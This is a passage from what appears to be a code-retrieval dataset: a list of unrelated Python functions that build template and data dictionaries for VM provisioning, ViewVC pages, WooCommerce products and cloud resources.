msg=msg)\n\n # create new vm template\n new_obj = VmTemplate(**request_content)\n\n # save objects\n try:\n new_obj.save()\n except IntegrityError as e:\n\n return failed(status=1001001, msg=str(e.__cause__))\n\n # return data\n data = new_obj.__dict__\n data.pop('_state')\n return success(data=data)", "def calc_template(template_def, config):\n template = Template(**template_def)\n #print \"template_def:\", template_def, \"config:\", config\n try:\n retvals = process_template(template, config, target=(None, None))\n except Exception:\n print(\"==== template ====\"); pprint(template_def)\n print(\"==== config ====\"); pprint(config)\n #traceback.print_exc()\n raise\n output = {}\n for rkey, rv in retvals.items():\n module_id, terminal_id = rkey\n module_key = str(module_id)\n output.setdefault(module_key, {})\n output[module_key][terminal_id] = rv.todict()\n return output", "def common_template_data(request, revision=None, mime_type=None):\n\n cfg = request.cfg\n\n # Initialize data dictionary members (sorted alphanumerically)\n data = TemplateData(\n {\n \"annotate_href\": None,\n \"cfg\": cfg,\n \"docroot\": (\n cfg.options.docroot is None\n and request.script_name + \"/\" + docroot_magic_path\n or cfg.options.docroot\n ),\n \"download_href\": None,\n \"download_text_href\": None,\n \"graph_href\": None,\n \"home_href\": request.script_name or \"/\",\n \"kv\": request.kv,\n \"lockinfo\": None,\n \"log_href\": None,\n \"nav_path\": nav_path(request),\n \"pathtype\": None,\n \"prefer_markup\": 
ezt.boolean(0),\n \"queryform_href\": None,\n \"rev\": None,\n \"revision_href\": None,\n \"rootname\": (request.rootname and request.server.escape(request.rootname) or None),\n \"rootpath\": request.rootpath,\n \"roots_href\": None,\n \"roottype\": request.roottype,\n \"rss_href\": None,\n \"tarball_href\": None,\n \"up_href\": None,\n \"username\": request.username,\n \"view\": _view_codes[request.view_func],\n \"view_href\": None,\n \"vsn\": __version__,\n \"where\": request.server.escape(request.where),\n }\n )\n\n rev = revision\n if not rev:\n rev = request.query_dict.get(\"annotate\")\n if not rev:\n rev = request.query_dict.get(\"revision\")\n if not rev and request.roottype == \"svn\":\n rev = request.query_dict.get(\"pathrev\")\n try:\n data[\"rev\"] = hasattr(request.repos, \"_getrev\") and request.repos._getrev(rev) or rev\n except vclib.InvalidRevision:\n raise ViewVCException(\"Invalid revision\", \"404 Not Found\")\n\n if request.pathtype == vclib.DIR:\n data[\"pathtype\"] = \"dir\"\n elif request.pathtype == vclib.FILE:\n data[\"pathtype\"] = \"file\"\n\n if request.path_parts:\n dir = _path_join(request.path_parts[:-1])\n data[\"up_href\"] = request.get_url(\n view_func=view_directory, where=dir, pathtype=vclib.DIR, params={}, escape=1\n )\n\n if \"roots\" in cfg.options.allowed_views:\n data[\"roots_href\"] = request.get_url(view_func=view_roots, escape=1, params={})\n\n if request.pathtype == vclib.FILE:\n fvi = get_file_view_info(request, request.where, data[\"rev\"], mime_type)\n data[\"view_href\"] = fvi.view_href\n data[\"download_href\"] = fvi.download_href\n data[\"download_text_href\"] = fvi.download_text_href\n data[\"annotate_href\"] = fvi.annotate_href\n data[\"revision_href\"] = fvi.revision_href\n data[\"prefer_markup\"] = fvi.prefer_markup\n data[\"log_href\"] = request.get_url(view_func=view_log, params={}, escape=1)\n if request.roottype == \"cvs\" and cfg.options.use_cvsgraph:\n data[\"graph_href\"] = request.get_url(view_func=view_cvsgraph, params={}, escape=1)\n file_data = request.repos.listdir(request.path_parts[:-1], request.pathrev, {})\n entries = [item for item in file_data if item.name == request.path_parts[-1]]\n if len(entries) == 1:\n request.repos.dirlogs(request.path_parts[:-1], request.pathrev, entries, {})\n data[\"lockinfo\"] = entries[0].lockinfo\n elif request.pathtype == vclib.DIR:\n data[\"view_href\"] = request.get_url(view_func=view_directory, params={}, escape=1)\n if \"tar\" in cfg.options.allowed_views:\n data[\"tarball_href\"] = request.get_url(view_func=download_tarball, params={}, escape=1)\n if request.roottype == \"svn\":\n data[\"revision_href\"] = request.get_url(\n view_func=view_revision, params={\"revision\": data[\"rev\"]}, escape=1\n )\n\n data[\"log_href\"] = request.get_url(view_func=view_log, params={}, escape=1)\n\n if is_querydb_nonempty_for_root(request):\n if request.pathtype == vclib.DIR:\n params = {}\n if request.roottype == \"cvs\" and request.pathrev:\n params[\"branch\"] = request.pathrev\n data[\"queryform_href\"] = request.get_url(\n view_func=view_queryform, params=params, escape=1\n )\n data[\"rss_href\"] = request.get_url(\n view_func=view_query, params={\"date\": \"month\", \"format\": \"rss\"}, escape=1\n )\n elif request.pathtype == vclib.FILE:\n parts = _path_parts(request.where)\n where = _path_join(parts[:-1])\n data[\"rss_href\"] = request.get_url(\n view_func=view_query,\n where=where,\n pathtype=request.pathtype,\n params={\"date\": \"month\", \"format\": \"rss\", \"file\": parts[-1], 
\"file_match\": \"exact\"},\n escape=1,\n )\n return data", "def _test_template_data(self):\n chars=string.ascii_uppercase + string.digits\n id = ''.join(random.choice(chars) for x in range(6))\n\n return {\n 'test_module': self.test_modulename(),\n 'driver_module': self.driver_modulename(),\n 'driver_dir': self.driver_dir(),\n 'file': self.driver_relative_path(),\n 'author': self.metadata.author,\n 'driver_name': self.metadata.driver_name,\n 'constructor': self.metadata.constructor,\n 'full_instrument_lower': self.metadata.driver_name.lower(),\n 'full_instrument_camelcase': self.driver_name_camelcase(),\n }", "def _calculate_custom_data(self):\n self.data['vms'] = Vms(self.vms, self.url)", "def create_template_dict(name, cat, boilerplate_name=None, is_common=False):\r\n return {\r\n \"display_name\": name,\r\n \"category\": cat,\r\n \"boilerplate_name\": boilerplate_name,\r\n \"is_common\": is_common\r\n }", "def prepare_template_vals(self, woo_instance, product_response):\n template_info_vals = {\n \"name\":product_response.get(\"name\"),\n \"woo_tmpl_id\":product_response.get(\"id\"),\n \"woo_instance_id\":woo_instance.id,\n \"woo_short_description\":product_response.get(\"short_description\", \"\"),\n \"woo_description\":product_response.get(\"description\", \"\"),\n \"website_published\":True if product_response[\"status\"] == \"publish\" else False,\n \"taxable\":True if product_response[\"tax_status\"] == \"taxable\" else False,\n \"woo_categ_ids\":product_response.get(\"categories\"),\n \"woo_tag_ids\":product_response.get(\"tags\"),\n \"total_variants_in_woo\":len(product_response[\"variations\"]),\n \"woo_product_type\":product_response[\"type\"],\n \"active\":True\n }\n if product_response.get(\"date_created\"):\n template_info_vals.update(\n {\"created_at\":product_response.get(\"date_created\").replace(\"T\", \" \")})\n if product_response.get(\"date_modified\"):\n template_info_vals.update(\n {\"updated_at\":product_response.get(\"date_modified\").replace(\"T\", \" \")})\n return template_info_vals", "async def _process_create_data(self, data: dict) -> dict:\n return self.SCHEMA(data)", "def parse_template(self):\n for line in self.raw_template.split(\"\\n\"):\n line = line.strip()\n if line.startswith('#m3'):\n key, val = line[3:].strip().split('=', 1)\n key = key.strip()\n val = val.strip()\n self.variables[key] = val\n\n for fitem in self.finditem.finditer(self.raw_template):\n fgrp = fitem.groups()\n categ = fgrp[0]\n name = fgrp[1]\n rest_str = fgrp[2]\n rest = {} # type: dict\n for item in rest_str.split('|'):\n item = item.strip()\n if item:\n key, val = item.split('=')\n rest[key] = val\n\n self.data[name] = (categ, rest)", "def pre_service_template_update(self, resource_id, resource_dict):\n pass", "def generate_template_dict(self):\n # Get the existing parameters\n params = super().generate_template_dict()\n\n # Add our custom parameters\n params['job_parameter_file'] = self.job_parameter_file\n params['job_output_directory'] = self.job_output_directory\n\n # Return the updated params\n return params", "def template_data(self) -> Any:\n return pulumi.get(self, \"template_data\")", "def pre_process_raw(raw: dict) -> dict:\n api_data = raw.get(\"data\", {}).get(\"apiList\", [])\n return {api[\"id\"]: api for api in api_data}", "def template_list(call=None):\n templates = {}\n session = _get_session()\n vms = session.xenapi.VM.get_all()\n for vm in vms:\n record = session.xenapi.VM.get_record(vm)\n if record[\"is_a_template\"]:\n templates[record[\"name_label\"]] = 
record\n return templates", "def _populate_user_and_project(self, template_dictionary, escape_db_operations=False):\n logged_user = get_logged_user()\n template_dictionary[KEY_USER] = logged_user\n show_help = logged_user is not None and logged_user.is_online_help_active()\n template_dictionary[KEY_SHOW_ONLINE_HELP] = show_help\n\n project = get_current_project()\n template_dictionary[KEY_PROJECT] = project\n if project is not None and not escape_db_operations:\n self.update_operations_count()\n return template_dictionary", "def _process_instance(self, instance):\n instance_dict = {}\n ins_zone = instance[\"zone\"]\n instance_dict[\"zone\"] = ins_zone[\n ins_zone.index(\"zones/\") + 6:len(ins_zone)]\n instance_dict[\"name\"] = instance[\"name\"]\n instance_dict[\"cloud\"] = self.kind\n instance_dict[\"status\"] = instance[\"status\"]\n instance_dict[\"type\"] = instance[\"cpuPlatform\"]\n instance_dict[\"created\"] = instance[\"creationTimestamp\"]\n instance_dict[\"id\"] = instance[\"id\"]\n instance_dict[\"kind\"] = instance[\"kind\"]\n machineTypeUrl = instance[\"machineType\"]\n instance_dict[\"machineType\"] = machineTypeUrl[machineTypeUrl.index(\n \"machineTypes/\") + 13:len(machineTypeUrl)]\n disks = instance[\"disks\"]\n disk = disks[0]\n instance_dict[\"deviceName\"] = disk[\"deviceName\"]\n instance_dict[\"diskSizeGb\"] = disk[\"diskSizeGb\"]\n licenses = disk[\"licenses\"][0]\n instance_dict[\"sourceImage\"] = licenses[\n licenses.index(\"licenses/\") + 9:len(\n licenses)]\n instance_dict[\"diskType\"] = disk[\"type\"]\n instance_dict[\"mode\"] = disk[\"mode\"]\n instance_dict[\"modified\"] = str(DateTime.now())\n\n # Network access.\n network_config = instance[\"networkInterfaces\"]\n\n if (network_config):\n network_config = network_config[0]\n access_config = network_config[\"accessConfigs\"]\n access_config = access_config[0]\n external_ip = access_config[\"natIP\"]\n instance_dict[\"public_ip\"] = external_ip\n\n return instance_dict", "def generate_page_sections_dict(self, project_page_data: dict):\n wiki_obj = WikiService()\n\n short_description = (\n f\"\\n{project_page_data['project']['shortDescription']}\\n\"\n )\n\n created_date = wiki_obj.format_date_text(\n project_page_data['project']['created']\n )\n # created_date_text = f\"\\n{created_date}\\n\" \n # due_date = wiki_obj.format_date_text(\n # project_page_data['project']['due_date']\n # )\n timeframe = (\n f\"\\n* '''Start Date:''' {created_date}\\n\"\n # f\"\\n* '''End Date:''' Estimate {due_date}\\n\"\n )\n\n\n project_url = (\n f\"\\n{project_page_data['project']['url']}\\n\"\n )\n\n hashtag = (\n project_page_data['project']['changesetComment']\n )\n hashtag = (\n project_page_data['project']['changesetComment'].replace(\n \"#\", \"<nowiki>#</nowiki>\"\n )\n )\n hashtag_text = (\n f\"\\n{hashtag}\\n\"\n )\n\n instructions_text = (\n project_page_data['project']\n ['externalSource']\n ['instructions']\n )\n instructions = (\n f\"\\n{instructions_text}\\n\"\n )\n\n per_task_instructions_text = (\n project_page_data['project']\n ['externalSource']\n ['perTaskInstructions']\n )\n per_task_instructions = (\n f\"\\n{per_task_instructions_text}\\n\"\n )\n\n imagery_text = (\n project_page_data['project']\n ['externalSource']\n ['imagery']\n )\n imagery = (\n f\"\\n{imagery_text}\\n\"\n )\n\n license_text = (\n project_page_data['project']\n ['externalSource']\n ['license']\n )\n license = (\n f\"\\n{license_text}\\n\"\n )\n\n # metrics = (\n # f\"\\n* {project_page_data.instructions}\\n\"\n # )\n # quality_assurance 
= (\n # f\"\\n* {project_page_data.quality_assurance}\\n\"\n # )\n\n users = project_page_data['project'][\"users\"]\n project_users = \"\"\n for user in users:\n project_users += (\n f\"\\n| {user['userId']}\\n| {user['userName']}\\n|-\"\n )\n\n \n\n project_page_sections = {\n self.short_description_section: short_description,\n self.timeframe_section: timeframe,\n # self.timeframe_section: {\n # self.created_section: created_date_text\n # }, # if choose use subsection for timeframe \n self.url_section: project_url,\n self.external_sources_section: {\n self.instructions_section: instructions,\n self.per_task_instructions_section: per_task_instructions,\n self.imagery_section: imagery,\n self.license_section: license\n },\n self.hashtag_section: hashtag_text,\n # self.instructions_section: instructions,\n # self.metrics_section: metrics,\n # self.quality_assurance_section: quality_assurance,\n self.team_user_section: {\n self.users_list_section: project_users\n }\n }\n return project_page_sections", "def refresh(self):\n script = 'Get-SCVMTemplate -ID \\\"{}\\\" -VMMServer $scvmm_server'\n try:\n data = self._get_json(script.format(self._id))\n except SCVMMSystem.PowerShellScriptError as error:\n if \"Error ID: 801\" in str(error):\n # Error ID 801 is a \"not found\" error\n data = None\n else:\n raise\n if not data:\n raise ImageNotFoundError(self._id)\n self.raw = data\n return self.raw", "def mk_data(self):\n self.data = self.DEFAULTS.copy()\n\n for template in self.raw_data.get('extends', []):\n template_data = self.load_template(template)\n self.data.update(template_data)\n\n self.data.update(self.raw_data)\n\n str_replace(self.data)\n\n if self.data.get('redirect_stderr'):\n self.data.pop('stderr')", "def context(template):\n\n return {\n v.key: v.read()\n for v in [Variable(name) for name in extract_variables(template)]\n }", "def _get_data(self):\n data = {}\n\n for name, field in self._get_fields().items():\n if isinstance(field, fields.Factory):\n # skip for factories for now\n continue\n value = getattr(self, name)\n raw_value = field.to_raw(value)\n if isinstance(field, fields.Secret):\n data[f\"__{name}\"] = raw_value\n else:\n data[name] = raw_value\n\n return data", "def create_field_template_dict(self, bids_atlas_label):\n if self.parcellation_scheme == \"NativeFreesurfer\":\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.graphml\",\n roi_volume_s2=\"anat/irrelevant.nii.gz\",\n roi_graphml_s2=\"anat/irrelevant.graphml\",\n roi_volume_s3=\"anat/irrelevant.nii.gz\",\n roi_graphml_s3=\"anat/irrelevant.graphml\",\n 
roi_volume_s4=\"anat/irrelevant.nii.gz\",\n roi_graphml_s4=\"anat/irrelevant.graphml\",\n roi_volume_s5=\"anat/irrelevant.nii.gz\",\n roi_graphml_s5=\"anat/irrelevant.graphml\",\n )\n # fmt:on\n elif self.parcellation_scheme == \"Custom\":\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_dseg.graphml\",\n roi_volume_s2=\"anat/irrelevant.nii.gz\",\n roi_graphml_s2=\"anat/irrelevant.graphml\",\n roi_volume_s3=\"anat/irrelevant.nii.gz\",\n roi_graphml_s3=\"anat/irrelevant.graphml\",\n roi_volume_s4=\"anat/irrelevant.nii.gz\",\n roi_graphml_s4=\"anat/irrelevant.graphml\",\n roi_volume_s5=\"anat/irrelevant.nii.gz\",\n roi_graphml_s5=\"anat/irrelevant.graphml\",\n )\n # fmt:on\n else:\n # fmt:off\n field_template = dict(\n diffusion=\"dwi/\" + self.subject + \"_desc-cmp_dwi.nii.gz\",\n bvecs=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bvec\",\n bvals=\"dwi/\" + self.subject + \"_desc-cmp_dwi.bval\",\n T1=\"anat/\" + self.subject + \"_desc-head_T1w.nii.gz\",\n aseg=\"anat/\" + self.subject + \"_desc-aseg_dseg.nii.gz\",\n aparc_aseg=\"anat/\" + self.subject + \"_desc-aparcaseg_dseg.nii.gz\",\n brain=\"anat/\" + self.subject + \"_desc-brain_T1w.nii.gz\",\n brain_mask=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n wm_mask_file=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n wm_eroded=\"anat/\" + self.subject + \"_label-WM_dseg.nii.gz\",\n brain_eroded=\"anat/\" + self.subject + \"_desc-brain_mask.nii.gz\",\n csf_eroded=\"anat/\" + self.subject + \"_label-CSF_dseg.nii.gz\",\n roi_volume_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale1_dseg.nii.gz\",\n roi_volume_s2=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale2_dseg.nii.gz\",\n roi_volume_s3=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale3_dseg.nii.gz\",\n roi_volume_s4=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale4_dseg.nii.gz\",\n roi_volume_s5=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale5_dseg.nii.gz\",\n roi_graphml_s1=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale1_dseg.graphml\",\n roi_graphml_s2=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale2_dseg.graphml\",\n roi_graphml_s3=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale3_dseg.graphml\",\n roi_graphml_s4=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale4_dseg.graphml\",\n roi_graphml_s5=\"anat/\" + self.subject + \"_atlas-\" + bids_atlas_label + \"_res-scale5_dseg.graphml\",\n )\n # fmt:on\n return field_template", "def 
_build_data(self):\n licence_types = [('all', 'All')] + [(lt.pk, lt.display_name) for lt in LicenceType.objects.all()]\n data = {\n 'applications': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n 'status': {\n 'values': [],\n }\n },\n 'ajax': {\n 'url': ''\n }\n },\n 'licences': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n },\n 'ajax': {\n 'url': ''\n }\n },\n 'returns': {\n 'columnDefinitions': [],\n 'filters': {\n 'licenceType': {\n 'values': licence_types,\n },\n },\n 'ajax': {\n 'url': ''\n }\n }\n }\n return data", "async def _process_create_data(self, data: dict) -> dict:\n validated_data: dict = validate_language(data)\n return validated_data", "def construct_dicts(self, path):\n module_dicts = self.read_dict(path, use_superpkg=True)\n\n id_dict = dict()\n name_dict = dict()\n\n for cmd_dict in module_dicts:\n # Create a cmd template object\n cmd_temp = cmd_template.CmdTemplate(\n cmd_dict[self.OP_CODE_FIELD],\n cmd_dict[self.MNEMONIC_FIELD],\n cmd_dict[self.COMPONENT_FIELD],\n cmd_dict[self.ARGS_FIELD],\n cmd_dict[self.DESC_FIELD],\n )\n\n id_dict[cmd_dict[self.OP_CODE_FIELD]] = cmd_temp\n name_dict[cmd_dict[self.MNEMONIC_FIELD]] = cmd_temp\n\n return (id_dict, name_dict)", "def generate_object_data(self):\n object_dict = {\n 'content_type' : str(self.target_object._meta),\n 'object_id' : str(self.target_object._get_pk_val()),\n }\n return object_dict", "def generate_object_data(self):\n object_dict = {\n 'content_type' : str(self.target_object._meta),\n 'object_id' : str(self.target_object._get_pk_val()),\n }\n return object_dict", "def generate(self) -> Dict[str, Any]:\n raise NotImplementedError", "def create(vm_):\n name = vm_[\"name\"]\n record = {}\n ret = {}\n\n # fire creating event\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"starting create\",\n \"salt/cloud/{}/creating\".format(name),\n args={\"name\": name, \"profile\": vm_[\"profile\"], \"provider\": vm_[\"driver\"]},\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n log.debug(\"Adding %s to cloud cache.\", name)\n __utils__[\"cloud.cachedir_index_add\"](\n vm_[\"name\"], vm_[\"profile\"], \"xen\", vm_[\"driver\"]\n )\n\n # connect to xen\n session = _get_session()\n\n # determine resource pool\n resource_pool = _determine_resource_pool(session, vm_)\n\n # determine storage repo\n storage_repo = _determine_storage_repo(session, resource_pool, vm_)\n\n # build VM\n image = vm_.get(\"image\")\n clone = vm_.get(\"clone\")\n if clone is None:\n clone = True\n log.debug(\"Clone: %s \", clone)\n\n # fire event to read new vm properties (requesting)\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"requesting instance\",\n \"salt/cloud/{}/requesting\".format(name),\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n\n # create by cloning template\n if clone:\n _clone_vm(image, name, session)\n else:\n _copy_vm(image, name, session, storage_repo)\n\n # provision template to vm\n _provision_vm(name, session)\n vm = _get_vm(name, session)\n\n # start vm\n start(name, None, session)\n\n # get new VM\n vm = _get_vm(name, session)\n\n # wait for vm to report IP via guest tools\n _wait_for_ip(name, session)\n\n # set static IP if configured\n _set_static_ip(name, session, vm_)\n\n # if not deploying salt then exit\n deploy = vm_.get(\"deploy\", True)\n log.debug(\"delopy is set to %s\", deploy)\n if deploy:\n record = session.xenapi.VM.get_record(vm)\n if record is not 
None:\n _deploy_salt_minion(name, session, vm_)\n else:\n log.debug(\"The Salt minion will not be installed, deploy: %s\", vm_[\"deploy\"])\n record = session.xenapi.VM.get_record(vm)\n ret = show_instance(name)\n ret.update({\"extra\": record})\n\n __utils__[\"cloud.fire_event\"](\n \"event\",\n \"created instance\",\n \"salt/cloud/{}/created\".format(name),\n args={\"name\": name, \"profile\": vm_[\"profile\"], \"provider\": vm_[\"driver\"]},\n sock_dir=__opts__[\"sock_dir\"],\n transport=__opts__[\"transport\"],\n )\n return ret", "def _populate_menu(self, template_dictionary):\n if KEY_FIRST_RUN not in template_dictionary:\n template_dictionary[KEY_FIRST_RUN] = False\n template_dictionary[KEY_LINK_ANALYZE] = self.analyze_category_link\n template_dictionary[KEY_LINK_CONNECTIVITY_TAB] = self.connectivity_tab_link\n if KEY_BACK_PAGE not in template_dictionary:\n template_dictionary[KEY_BACK_PAGE] = False\n template_dictionary[KEY_SECTION_TITLES] = WebStructure.WEB_SECTION_TITLES\n template_dictionary[KEY_SUBSECTION_TITLES] = WebStructure.WEB_SUBSECTION_TITLES\n return template_dictionary", "def _prepare_data(\n self,\n request_data: Optional[Dict[str, Any]] = None,\n ) -> Dict[str, Any]:\n if request_data is None:\n request_data = {}\n request_data['page.rows'] = self._rows_in_page\n if self._current_row:\n request_data['page.number'] = \\\n self._current_row // self._rows_in_page + 1\n else:\n # Page number starts from 0\n page_number = self._min_row // self._rows_in_page\n # But for request page number starts from 1\n request_data['page.number'] = page_number + 1\n self._current_row = self._rows_in_page * page_number\n return request_data", "def build_private_data(self, project_update, private_data_dir):\n private_data = {'credentials': {}}\n if project_update.credential:\n credential = project_update.credential\n if credential.has_input('ssh_key_data'):\n private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')\n return private_data", "def load_template(mapping_location: str, vendorname: str) -> Dict:\n\n location = mapping_location\n\n #check if template mapping file exists\n # can be checked at the source if Invoice Parser used with GUI\n \n try:\n os.path.exists(location)\n except Exception as e:\n print(\"{0}. File not found\".format(e))\n else:\n with open(location) as t:\n mapping = json.load(t)\n\n #checking if mapping has vendorname\n try:\n mapping[vendorname]\n except KeyError as e:\n print(\"KeyError {0}. Vendor does not have a template\".format(e))\n else:\n\n template_file_location = mapping[vendorname]\n\n #checking if template file exists\n try:\n os.path.exists(template_file_location)\n except Exception as e:\n print(\"{0}. 
File not found\".format(e))\n else:\n with open(template_file_location) as templ:\n data = json.load(templ)\n \n return data", "def get_hypervisors(self):\n json_scheme = self.gen_def_json_scheme('GetHypervisors')\n json_obj = self.call_method_post(method='GetHypervisors', json_scheme=json_scheme)\n self.json_templates = json_obj\n d = dict(json_obj)\n for elem in d['Value']:\n hv = self.hypervisors[elem['HypervisorType']]\n for inner_elem in elem['Templates']:\n o = Template(hv)\n o.template_id = inner_elem['Id']\n o.descr = inner_elem['Description']\n o.id_code = inner_elem['IdentificationCode']\n o.name = inner_elem['Name']\n o.enabled = inner_elem['Enabled']\n if hv != 'SMART':\n for rb in inner_elem['ResourceBounds']:\n resource_type = rb['ResourceType']\n if resource_type == 1:\n o.resource_bounds.max_cpu = rb['Max']\n if resource_type == 2:\n o.resource_bounds.max_memory = rb['Max']\n if resource_type == 3:\n o.resource_bounds.hdd0 = rb['Max']\n if resource_type == 7:\n o.resource_bounds.hdd1 = rb['Max']\n if resource_type == 8:\n o.resource_bounds.hdd2 = rb['Max']\n if resource_type == 9:\n o.resource_bounds.hdd3 = rb['Max']\n self.templates.append(o)\n return True if json_obj['Success'] is 'True' else False", "def _get_vm_instance_data(self, services, deployment, deployed_app):\n internal_service, external_service = self._get_internal_external_services_set(\n services\n )\n\n data = [\n VmDetailsProperty(key=\"Image\", value=self._get_image(deployment)),\n VmDetailsProperty(\n key=\"Replicas\", value=self._get_replicas(deployment, deployed_app)\n ),\n VmDetailsProperty(\n key=\"Ready Replicas\", value=self._get_ready_replicas(deployment)\n ),\n VmDetailsProperty(\n key=\"Internal IP\", value=self.get_internal_ip(internal_service)\n ),\n VmDetailsProperty(\n key=\"Internal Ports\", value=self._get_service_ports(internal_service)\n ),\n VmDetailsProperty(\n key=\"External IP\", value=self.get_external_ip(external_service)\n ),\n VmDetailsProperty(\n key=\"External Ports\",\n value=self._get_external_service_ports(external_service),\n ),\n ]\n\n return data", "def _build_requestContext(self, startTime=datetime(1970, 1, 1, 0, 0, 0, 0, pytz.timezone(settings.TIME_ZONE)), endTime=datetime(1970, 1, 1, 0, 59, 0, 0, pytz.timezone(settings.TIME_ZONE)), data=[], tzinfo=pytz.utc):\n return {\n 'template': {},\n 'args': ({}, {}),\n 'startTime': startTime,\n 'endTime': endTime,\n 'localOnly': False,\n 'data': data,\n 'tzinfo': tzinfo\n }", "def _generate_voter_in_dict(id: bytes, timestamp: int, prep: 'Prep') -> dict:\n voter_in_dict = {\n \"id\": '0x' + bytes.hex(id),\n \"timestamp\": timestamp,\n \"address\": str(prep.address),\n \"name\": prep.name,\n \"amount\": prep.delegated\n }\n return voter_in_dict", "def render_application_template(self):\n self.pipeline_config['instance_links'] = self.retrieve_instance_links()\n jsondata = get_template(\n template_file='infrastructure/app_data.json.j2', appinfo=self.appinfo, pipeline_config=self.pipeline_config)\n return jsondata", "def test_get_templates_in_virtualization_realm(self):\n pass", "def get_instance_templates(self):\n response = self.call_api('/global/instanceTemplates')\n return {\n template['name']: template for template in response.get('items', [])\n }", "def build_response_dict(self):\n return {\n \"release\": self.settings['bookstore'][\"release\"],\n \"features\": self.settings['bookstore'][\"features\"],\n }", "def _transform(self, resource_from_api):\n for (project_id, backend_services) in resource_from_api.iteritems():\n for 
backend_service in backend_services:\n yield {'project_id': project_id,\n 'id': backend_service.get('id'),\n 'creation_timestamp': parser.format_timestamp(\n backend_service.get('creationTimestamp'),\n self.MYSQL_DATETIME_FORMAT),\n 'name': backend_service.get('name'),\n 'description': backend_service.get('description'),\n 'affinity_cookie_ttl_sec': self._to_int(\n backend_service.get('affinityCookieTtlSec')),\n 'backends': parser.json_stringify(\n backend_service.get('backends', [])),\n 'cdn_policy': parser.json_stringify(\n backend_service.get('cdnPolicy', {})),\n 'connection_draining': parser.json_stringify(\n backend_service.get('connectionDraining', {})),\n 'enable_cdn': self._to_bool(\n backend_service.get('enableCDN')),\n 'health_checks': parser.json_stringify(\n backend_service.get('healthChecks', [])),\n 'iap': parser.json_stringify(\n backend_service.get('iap', {})),\n 'load_balancing_scheme': backend_service.get(\n 'loadBalancingScheme'),\n 'port': self._to_int(backend_service.get('port')),\n 'port_name': backend_service.get('portName'),\n 'protocol': backend_service.get('protocol'),\n 'region': backend_service.get('region'),\n 'session_affinity': backend_service.get(\n 'sessionAffinity'),\n 'timeout_sec': backend_service.get('timeoutSec'),\n 'raw_backend_service':\n parser.json_stringify(backend_service)}", "def vcac_getvm_detail_svrreq(self, srid):\n \n self.reqid=srid\n try:\n #Get the name of the vm and return JSON formatted response\n \n jfile=os.path.join(\"%s\", \"%s.json\") % (self.data['rundir'], self.reqid )\n print \"\\n\"\n print \"######## [Waiting for customization for SR: %s] ########\" % self.reqid\n print \"\\n\"\n time.sleep(300.0)\n vrapath=BASE_DIR + '/' + 'tools/vracc/bin/'\n cmd=\"cd %s && ./cloudclient.sh vra machines list --requestId %s --format \" \\\n \"JSON --export %s\" % ( vrapath, self.reqid, jfile )\n request = execute_action(cmd)\n except APIError, e:\n print \"Found error## vcac_getvm_detail_svrreq: %s\" % str(e)\n sys.exit(1)\n else:\n logging.debug(\"Verify return value after validation query: %s\" % (request))\n self.gtintval = self.gtintval + 